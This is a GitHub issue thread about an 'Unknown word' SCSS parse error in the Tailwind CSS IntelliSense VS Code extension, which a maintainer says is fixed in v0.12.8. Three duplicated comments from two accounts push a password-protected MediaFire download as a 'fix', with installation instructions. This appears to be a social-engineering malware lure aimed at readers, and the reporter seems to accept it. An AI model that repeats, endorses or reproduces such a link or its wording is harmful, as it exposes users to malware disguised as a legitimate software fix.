### ISSUE TITLE
Unknown word

### ISSUE THREAD

**Issue by joy-stacks** [tailwindlabs/tailwindcss-intellisense#1036]
**V 0.12.7**

Unknown word
You tried to parse SCSS with the standard CSS parser; try again with the postcss-scss parser
    at qd.error (c:\Users\92418\.vscode\extensions\bradlc.vscode-tailwindcss-0.12.7\dist\tailwindServer.js:195:35103)
    at jw.unknownWord (c:\Users\92418\.vscode\extensions\bradlc.vscode-tailwindcss-0.12.7\dist\tailwindServer.js:201:7868)
    at jw.other (c:\Users\92418\.vscode\extensions\bradlc.vscode-tailwindcss-0.12.7\dist\tailwindServer.js:201:6274)
    at jw.parse (c:\Users\92418\.vscode\extensions\bradlc.vscode-tailwindcss-0.12.7\dist\tailwindServer.js:201:6593)
    at O0 (c:\Users\92418\.vscode\extensions\bradlc.vscode-tailwindcss-0.12.7\dist\tailwindServer.js:201:8182)
    at new e (c:\Users\92418\.vscode\extensions\bradlc.vscode-tailwindcss-0.12.7\dist\tailwindServer.js:204:1635)
    at Jc.process (c:\Users\92418\.vscode\extensions\bradlc.vscode-tailwindcss-0.12.7\dist\tailwindServer.js:204:9554)
    at e.resolveSourceDirectives (c:\Users\92418\.vscode\extensions\bradlc.vscode-tailwindcss-0.12.7\dist\tailwindServer.js:1283:16417)
    at c:\Users\92418\.vscode\extensions\bradlc.vscode-tailwindcss-0.12.7\dist\tailwindServer.js:1283:13635
    at Array.map (<anonymous>) {
  reason: 'Unknown word',

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by joy-stacks** [comment]
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."

ok, thanks

**Comment by Ali-ovo** [comment]
I have the same error

**Comment by philipp-spiess** [comment]
Hey @joy-stacks! Thanks for reporting this and sorry for the troubles! We just release v0.12.8 of the VS Code extension with a fix that resolves this issue. If you still have issues, please let us know!
